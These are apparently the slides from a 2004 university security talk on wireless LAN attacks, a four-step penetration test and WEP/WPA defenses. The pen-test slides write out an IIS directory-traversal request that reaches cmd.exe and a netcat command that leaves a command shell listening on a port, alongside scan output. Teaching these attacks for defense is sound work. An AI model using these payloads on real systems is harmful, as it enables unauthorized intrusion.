Wireless Attacks and Penetration Testing Techniques

1
Wireless Attacks and Penetration Testing
Techniques

• Jonathan Hassell
• Lockdown
• UW-Madison
• Thursday, August 5, 2004

2
About the Presenter

• Books
• RADIUS, OReilly and Associates
• Hardening Windows, Apress
• Managing Windows Server 2003, OReilly and
  Associates (October 2004)
• Using Small Business Server 2003, Apress (2005)
• Articles
• SecurityFocus http//www.securityfocus.com
• PC Pro Windows .NET Magazine Network

3
Todays Agenda

• Types of Wireless Attacks
• Other WLAN Security Considerations
• Anatomy of a Pen-test
• Fixing WEP Problems
• Recent Developments in WLAN Security
• QA (subject to time constraints)

4
WLANs Security

• Multiple venues for attack
• Signal boundaries
• Virtual port
• Primary forms of attack
• Denial of Service (DoS)
• Man-in-the-Middle
• ARP Poisoning

5
Denial of Service (DoS)

• Objective prevent users from accessing network
  resources
• Physical layer attacks
• Interference
• Lack of evidence
• Data link layer attacks
• Antenna hacks
• Spoofed access points
• Network layer attacks
• Big ping requests

6
Man-in-the-Middle Attacks

• Objective
• I to easedrop
• II more nefariously, to manipulate and modify
• Eavesdropping
• Manipulation
• Prevention

7
ARP Poisoning

• Objective eavesdropping and manipulation
• Address Resolution Protocol
• Cache
• Modern OSes are L-A-Z-Y!
• Structure of the attack

8
Other WLAN Security Issues

• War Driving
• War dialing
• Warchalking
• Wired Equivalent Privacy (WEP)
• The premise
• The 24-bit problem
• The result

9
Anatomy of a Penetration Test

• Four phases
• Gaining access
• Finding available servers
• Determining available services
• Exploiting a known vulnerability

10
Phase 1 WEP Key Cracking

• AirSnort
• Passively monitor transmissions
• Derive encryption key with adequate number of
  collected packets (5-10 mil.)
• ALL 802.11b networks with 40/128-bit WEP
  encryption are vulnerable

11
Phase 1 continued

• Once you press Start
• Weak IVs expose one key byte
• AirSnort collects these weak IVs and sorts them
  by exposed key byte
• Computes probable value for that key byte using
  advanced statistics
• Lather, rinse, repeat for each key byte
• Big guess to generate probable entire key
• Then -- associate and attack!

12
Phase 1 continued

• AirSnort

13
Phase 2 Port Scanning

• Detect anomalies and openings from the outside
• NMAP
• www.insecure.org
• The standard on Linux

14
Phase 2 continued

• root_at_mailedge root nmap jonathanhassell.com
• Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
• Interesting ports on cpe-069-132-170-148.carolina.
  rr.com (69.132.170.148)
• (The 1596 ports scanned but not shown below are
  in state filtered)
• Port State Service
• 25/tcp open smtp
• 80/tcp open http
• 113/tcp closed auth
• 443/tcp open https
• 444/tcp open snpp
• Nmap run completed -- 1 IP address (1 host up)
  scanned in 170 seconds

15
Phase 3 Identify Vulnerable Apps

• Probe those open ports to see what lies beneath
• NetCat the swiss army knife
• Send improperly crafted packets
• Create connections
• Grab and send input and output

16
Phase 3 continued

• Recall that port 80 is open!
• Use NetCat to get service banner
• linux netcat -v -n 192.168.0.2 80
• (UNKNOWN) 192.168.0.2 80 (?) open
• GET HTTP
• HTTP/1.1 400 Bad Request
• Server Microsoft-IIS/5.0
• Date Tue, 01 Jun 2004 225611 GMT
• Content-Type text/html
• Content-Length 87
• Connection close
• Content-Length 34
• lthtmlgtltheadgtlttitlegtErrorlt/titlegtlt/headgtltbodygtThe
  parameter
• lt/htmlgt

17
Phase 4 Cracking It

• Were still using NetCat
• linux netcat -v -n 192.168.0.2 80
• (UNKNOWN) 192.168.0.2 80 (?) open
• GET HTTP//192.168.0.2/SCRIPTS/..255C../WINNT/SYS
  TEM32/CMD.EXE?/CDIRC
• You have just returned a listing of all contents
  of the C drive.
• You also know how to spawn a command shell.
• The system is cracked.

18
Phase 4 continued

• Other crappy things crackers can do with NetCat
• Leave it running
• nc L p 7896 d e cmd.exe
• Spawns CMD.EXE when a connection is made to port
  7896
• Other tools crackers can use to do crappy things
• Whisker

19
DISCLAIMER

• That attack is old!
• It should have been patched!
• Demonstration purposes only
• The points
• NetCat is your best friend and worst enemy.
• Some hacks really are this simple.
• Know thine enemy.

20
Fixing WEP Problems

• Basic steps
• Use longer keys
• Change keys frequently
• Use APs on dedicated, firewalled ports
• Use VPNs for sensitive data
• Use other techniques
• IPsec
• Etc.

21
Fixing Web Problems, Part II

• Upgrade firmware
• Weak IV exploit is virtually non-existent.
• Is this the band-aid we need?
• Look at the problem itself!
• Firmware upgrades are nothing more than a stopgap

22
Wi-Fi Protected Access (WPA)

• Temporal Key Integrity Protocol (TKIP)
• Core component
• Does what WEP doesnt
• Stronger algorithm but works on current HW
• Verifies security configuration after keys are
  determined
• Synchronizes changing key for each frame

23
WPA-PSK

• WPA-Pre-Shared Key (PSK)
• Simplified but still powerful of WPA suitable for
  small business and home networking
• Sets an initial static key
• TKIP takes over the rest, changing at regular
  interval

24
WPA-Enterprise

• TKIP still used, as described in previous slide
• Add back-end authentication server
• Uses Extensible Authentication Protocol (EAP)
• Most of the time, RADIUS is used
• EAP-over-RADIUS

25
And The Other Shoe Drops

• Problems with WPA
• WPA passphrases containing dictionary words less
  than 20 characters long could possibly be cracked
• EAP itself transmits in cleartext there isnt
  any encryption.
• Transport Layer Security (TLS)
• Requires certificates on all clients
• TTLS solves that problem
• Cisco and Microsoft Protected EAP (PEAP)
• Most experts see this as the winner

26
WPA Support

• Windows XP
• Home or Professional
• Service Pack 1 plus additional patch
• Service Pack 2 will have additional patch
  included
• What if you dont have a RADIUS back-end?
• Linksys Wireless Guard

27
Looking at the Crystal Ball

• The Future is 802.11i
• Includes TKIP
• 100 years of continuous transmission to deplete
  the keyspace
• More efficient and direct mechanism to detect
  packet tampering
• Advanced Encryption Standard (AES)
• Probably need new hardware to perform these
  advanced calculations

28
Recapping Todays Session

• Types of Wireless Attacks
• DoS, Man-in-the-Middle ARP Poisoning
• Other WLAN Security Considerations
• War driving, WEP and its weaknesses
• Anatomy of a Pen-test
• Breaking key, scanning, identifying, cracking
• Fixing WEP Problems
• WEP stopgaps WPA-PSK WPA-Enterprise
• Recent Developments in WLAN Security
• TTLS/PEAP, AES with 802.11i

29
THANK YOU!

• I sincerely hope this was helpful
• Contact e-mail JHASSELL_at_GMAIL.COM
• Seminar information at http//www.hardeningwin.com
  
• If you liked this, please tell the venue
• If you didnt, send me an e-mail and tell me why!

30
WLAN SecurityQuestion and Answer Session

• Lockdown
• Univ. of Wisconsin at Madison
• Thursday, August 5, 2004